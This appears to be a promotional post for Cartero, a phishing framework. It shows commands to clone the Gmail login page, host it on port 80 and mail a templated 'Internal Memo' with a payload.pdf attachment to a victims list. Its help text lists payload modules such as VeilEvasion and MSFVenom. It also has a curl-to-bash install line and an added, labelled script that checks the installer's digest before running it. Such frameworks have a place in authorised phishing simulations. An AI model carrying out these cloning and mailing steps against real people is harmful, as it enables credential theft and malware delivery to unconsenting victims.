With a lot of modules and a good CLI interface
Cartero is a phishing framework with a full-featured CLI and a modular structure divided into commands that perform independent tasks (e.g. Mailer, Cloner, Listener, AdminConsole).
Each sub-command can be configured and automated.
The project was born out of necessity through years of engagements with tools that just didn’t do the job. Even though there are many projects out there, we were not able to find a suitable solution that gave us both ease of use and customizability.
The usage is really simple, for example you can clone the Gmail.com interface:
```
❯❯❯ ./cartero Cloner --url https://gmail.com --path /tmp --webserver gmail_com
❯❯❯ ./cartero Listener --webserver /tmp/gmail_com -p 80
Launching mongodb
Puma starting in single mode...
* Version 2.8.2 (ruby 2.1.1-p76), codename: Sir Edmund Percival Hillary
* Min threads: 4, max threads: 16
* Environment: production
* Listening on tcp://0.0.0.0:80
Use Ctrl-C to stop
```
And once the cloned site is up and running we can simply use the Mailer command to send templated emails to the victims:
```
❯❯❯ ./cartero Mailer --data victims.json --server gmail_com --subject "Internal Memo" --htmlbody email_html.html --attachment payload.pdf --from "John Doe <[email protected]>"
Sending [email protected]
Sending [email protected]
Sending [email protected]
```
The installation process is pretty simple, just one command line:
```
curl -L https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh | bash
```
that automagically installs Ruby, MongoDB and all dependencies.
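Piping a script from a mutable `master` branch straight into `bash` runs whatever the URL serves at that moment. The following is an added example, not part of the original post or of Cartero: it downloads the same `setup.sh` to disk, checks it against a SHA-256 digest the operator recorded after reviewing the script, and only then runs it. The function names are hypothetical and the expected digest is an operator-supplied value, not one published by the project.

```shell
#!/usr/bin/env bash
# Added example (not Cartero's code): download, verify, then run setup.sh.
# Function names are hypothetical; the expected digest is supplied by the operator.
SETUP_URL="https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh"

# sha256_of FILE: print the hex SHA-256 (sha256sum on Linux, shasum on macOS).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_script FILE EXPECTED: 0 on match, 1 on mismatch, 2 if unreadable.
verify_script() {
  local file="$1" expected="$2" actual
  [ -f "$file" ] || { echo "missing: $file" >&2; return 2; }
  actual="$(sha256_of "$file")" || return 2
  if [ "$actual" != "$expected" ]; then
    echo "digest mismatch for $file: got $actual" >&2
    return 1
  fi
  return 0
}

# fetch_script URL OUT: HTTPS only, fail on HTTP errors, write to disk, never execute.
fetch_script() {
  curl --fail --silent --show-error --location --proto '=https' -o "$2" "$1"
}

# install_reviewed EXPECTED: run the script only if it is the copy that was reviewed.
install_reviewed() {
  local expected="$1" tmp rc=0
  tmp="$(mktemp)" || return 2
  { fetch_script "$SETUP_URL" "$tmp" \
      && verify_script "$tmp" "$expected" \
      && bash "$tmp"; } || rc=$?
  rm -f "$tmp"
  return "$rc"
}
```

Record the digest once with `sha256_of` after reading the downloaded script, then call `install_reviewed <digest>`; a mismatch means the file served from `master` has changed since the review.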
```
Usage: cartero [options]

List of Commands:
    Cloner, Listener, Twilio, IMessage, GoogleVoice, Servers, MSFRpcd, BeefConsole, AdminWeb, Update, AdminConsole, LinkedIn, Xmpp, WebMailer, Mailer, Templates, DNSServer, LetsEncrypt, Mongo

List of Payloads:
    SMBRedirect, VeilEvasion, Beef, MSFVenom

Global options:
        --proxy [HOST:PORT]          Sets TCPSocket Proxy server
    -c, --config [CONFIG_FILE]       Provide a different cartero config file
    -v, --[no-]verbose               Run verbosely
    -p [PORT_1,PORT_2,..,PORT_N],    Global Flag to set Mailer and Webserver ports
        --ports
    -m, --mongodb [HOST:PORT]        Global flag to Set MongoDB bind_ip and port
    -d, --debug                      Sets debug flag on/off
        --editor [EDITOR]            Edit Server

Common options:
        --list-commands              Prints list of commands for bash completion
        --commands-table             Prints list of commands details
        --list-payloads              Prints list of payloads for bash completion
        --payloads-table             Prints list of payloads details
    -h, --help [COMMAND]             Show this message
        --list-options               Show list of long available options
        --list-short-options         Show list of short available options
        --version                    Shows cartero CLI version
```